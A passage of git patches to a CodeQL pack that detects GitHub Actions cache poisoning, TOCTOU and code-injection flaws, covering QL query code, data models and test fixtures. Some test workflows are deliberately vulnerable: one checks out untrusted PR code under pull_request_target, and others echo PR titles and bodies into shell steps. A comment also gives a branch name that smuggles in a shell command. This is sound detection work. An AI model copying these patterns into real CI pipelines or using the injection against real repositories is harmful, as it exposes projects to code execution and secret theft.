[PATCH 0281/1267] temporary fix --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index df2e1db3bdd..b60eb7da761 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,4 +1,5 @@ import actions +import codeql.actions.dataflow.ExternalFlow string defaultBranchTriggerEvent() { result = From a2503dd14b8bf028a6f28fb3c4bc6d9355441f7c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:22:40 +0000 Subject: [PATCH 0282/1267] fix default_branch_name visibility --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++---------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index b60eb7da761..69590a4a0de 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -15,35 +15,35 @@ predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and - ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" - or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name - or - e.getName() = "pull_request_target" and + repositoryDataModel(_, default_branch_name) and ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and + e.getName() = "push" and e.getAPropertyValue("branches") = default_branch_name or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = default_branch_name + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name + ) ) ) ) From 1a4939a13ba37ccd1d6dac0a8bc6af63c8c28888 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 16:19:58 +0200 Subject: [PATCH 0283/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 2293080d93e..f71f2081c8f 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,8 +2,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: - - ["public", "main"] + data: [] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From 11edff936b2a66da31ae278b9f9efe6104c0d62f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:27:59 +0000 Subject: [PATCH 0284/1267] Fix tests --- .../actions/security/CachePoisoningQuery.qll | 63 +++++++++++-------- 1 file changed, 36 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 69590a4a0de..d2a5909206e 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -11,39 +11,48 @@ string defaultBranchTriggerEvent() { ] } +string defaultBranchNames() { + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = default_branch_name + ) + or + not exist(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = ["main", "master"] + ) +} + predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name - ) + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 17a6d28e18db8b8c61e0ce9275570fc91e18e1f8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:17 +0000 Subject: [PATCH 0285/1267] Fix OR --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index d2a5909206e..3cb84561b54 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -18,9 +18,9 @@ string defaultBranchNames() { ) or not exist(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = ["main", "master"] - ) + repositoryDataModel(_, default_branch_name) + ) and + result = ["main", "master"] } predicate runsOnDefaultBranch(Job j) { From 00052d1ea117af39d03fce6c71d3273421982277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:57 +0000 Subject: [PATCH 0286/1267] exists --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 3cb84561b54..318548859b5 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -17,7 +17,7 @@ string defaultBranchNames() { result = default_branch_name ) or - not exist(string default_branch_name | + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name) ) and result = ["main", "master"] From 6f87b755045f4b4121a3700efb11246a4081e540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 17:44:16 +0200 Subject: [PATCH 0287/1267] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8b14b75062a..96fd8bdd1a4 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,6 +1,8 @@ name: Tests on: push: + branches: + - master pull_request: workflow_dispatch: From 731889bf88bde11f09ecf4039982cddf6cfc04ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 21:29:51 +0200 Subject: [PATCH 0288/1267] Bump qlpack versions --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 5 +++-- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 3047ba35b06..03b6c87405e 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -38,8 +38,9 @@ predicate staticallyIdentifiedSelfHostedRunner(Job job) { */ predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and + repositoryDataModel("public", _) and + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _, + job.getId(), _, _, runner_info) and runner_info.indexOf("self-hosted:true") > 0 ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 54748d6fd62..7413744d3ff 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.24 +version: 0.0.25 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1b8d7e64028..6bb27759f06 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.24 +version: 0.0.25 groups: - actions - queries From 446765bcbb4fc89d459d805cd2b97f2c17072c7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 22:08:03 +0200 Subject: [PATCH 0289/1267] Update Cache Poisoning rule --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 11da318f474..0250d9aada1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,11 +18,10 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // Excluding privileged workflows since they can be easily exploited in similar circumstances - not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request + // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and ( // The job writes to the cache @@ -33,7 +32,9 @@ where // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and - s instanceof PoisonableStep + s instanceof PoisonableStep and + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, s.toString() From 888b9fecca8c9c3c1ee450139e7d19886906d26d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 0290/1267] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc..a3fcc9e0403 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d..562fc0809b7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From c47fdd123d8db73c51ce9b3802daca1a06a3f43c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 0291/1267] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 00000000000..1debaecf97d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 1b4246e7f18fc947c67810f7370786bc7cf274ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 11:32:21 +0200 Subject: [PATCH 0292/1267] Update tests for cache poisoning --- ql/test/query-tests/Security/CWE-349/CachePoisoning.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index f0ee6d70001..6bef24d86d7 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,5 +6,6 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From f325d40a2274d883986bef4c2ab8dff2a1943538 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 15:55:12 +0200 Subject: [PATCH 0293/1267] Ensure event sources are available for triggering events --- .../codeql/actions/dataflow/ExternalFlow.qll | 33 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 63 ++++++++++++++++--- .../internal/ExternalFlowExtensions.qll | 18 ++++-- .../ext/workflow-models/workflow-models.yml | 48 ++++++++++++++ .../.github/workflows/pull_request_target.yml | 5 +- .../CWE-094/.github/workflows/self_needs.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 8 +-- .../CWE-094/PrivilegedCodeInjection.expected | 13 ++-- .../Security/CWE-094/action1/action.yml | 14 ----- 9 files changed, 154 insertions(+), 50 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index f10a90ee6ee..a52cc427d35 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,19 +2,42 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) } -predicate repositoryDataModel( - string visibility, string default_branch_name -) { +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { Extensions::repositoryDataModel(visibility, default_branch_name) } +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 08717c33787..063a3f671a3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,8 +95,7 @@ private predicate branchEvent(string context) { // - They cannot contain a \ // eg: zzz";echo${IFS}"hello";# would be a valid branch name "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", - "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "github\\.event\\.merge_group\\.head_ref", ] @@ -165,7 +164,8 @@ private predicate pathEvent(string context) { reg = [ // filename - "github\\.event\\.workflow\\.path", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -197,11 +197,33 @@ private predicate jsonEvent(string context) { ) } -class EventSource extends RemoteFlowSource { +class GitHubSource extends RemoteFlowSource { string flag; - EventSource() { - exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + GitHubSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + Utils::normalizeExpr(context) = "github.head_ref" and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + flag = "branch" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventSource extends RemoteFlowSource { + string flag; + + GitHubEventSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + | titleEvent(context) and flag = "title" or urlEvent(context) and flag = "url" @@ -217,8 +239,33 @@ class EventSource extends RemoteFlowSource { usernameEvent(context) and flag = "username" or pathEvent(context) and flag = "filename" - or - jsonEvent(context) and flag = "json" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + + GitHubEventJsonSource() { + exists(Expression e, string context | + this.asExpr() = e and + context = e.getExpression() and + ( + jsonEvent(context) and + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + ) + ) and + flag = "json" ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 34f0297d799..415c02dc1ba 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -23,11 +23,19 @@ extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); +/** + * Holds if workflow data model exists for the given parameters. + */ extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ); -extensible predicate repositoryDataModel( - string visibility, string default_branch_name -); +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if context/trigger mapping exists for the given parameters. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f71f2081c8f..404e894a5f8 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -7,3 +7,51 @@ extensions: pack: githubsecuritylab/actions-all extensible: workflowDataModel data: [] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: contextTriggerDataModel + data: + # This predicate maps triggering events with the github event context available for that event + - ["commit_comment", "github.event.comment"] + - ["discussion", "github.event.discussion"] + - ["discussion_comment", "github.event.comment"] + - ["discussion_comment", "github.event.discussion"] + - ["issues", "github.event.issue"] + - ["issue_comment", "github.event.issue"] + - ["issue_comment", "github.event.comment"] + - ["gollum", "github.event.pages"] + - ["merge_group", "github.event.merge_group"] + - ["pull_request", "github.event.pull_request"] + - ["pull_request", "github.head_ref"] + - ["pull_request_comment", "github.event.comment"] + - ["pull_request_comment", "github.event.pull_request"] + - ["pull_request_comment", "github.head_ref"] + - ["pull_request_review", "github.event.pull_request"] + - ["pull_request_review", "github.event.review"] + - ["pull_request_review", "github.head_ref"] + - ["pull_request_review_comment", "github.event.comment"] + - ["pull_request_review_comment", "github.event.pull_request"] + - ["pull_request_review_comment", "github.event.review"] + - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_target", "github.event.pull_request"] + - ["pull_request_target", "github.head_ref"] + - ["push", "github.event.commits"] + - ["push", "github.event.head_commit"] + - ["repository_dispatch", "github.event.client_payload"] + - ["workflow_dispatch", "github.event.inputs"] + - ["workflow_run", "github.event.workflow"] + - ["workflow_run", "github.event.workflow_run"] + # workflow_call receives the same event payload as the calling workflow + - ["workflow_call", "github.event.client_payload"] + - ["workflow_call", "github.event.comment"] + - ["workflow_call", "github.event.commits"] + - ["workflow_call", "github.event.discussion"] + - ["workflow_call", "github.event.head_commit"] + - ["workflow_call", "github.event.inputs"] + - ["workflow_call", "github.event.issue"] + - ["workflow_call", "github.event.merge_group"] + - ["workflow_call", "github.event.pages"] + - ["workflow_call", "github.event.pull_request"] + - ["workflow_call", "github.event.review"] + - ["workflow_call", "github.event.workflow"] + - ["workflow_call", "github.event.workflow_run"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 995fefe4a15..4ca3753f50c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it - - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' @@ -14,3 +14,4 @@ jobs: - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - run: echo '${{ github.event.pull_request.head.ref }}' - run: echo '${{ github.head_ref }}' + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index afd39605bb3..9992fd8e4cb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,7 +13,7 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - run: ${{ steps.source.outputs.value }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 34e173a055b..dc653a074e9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | 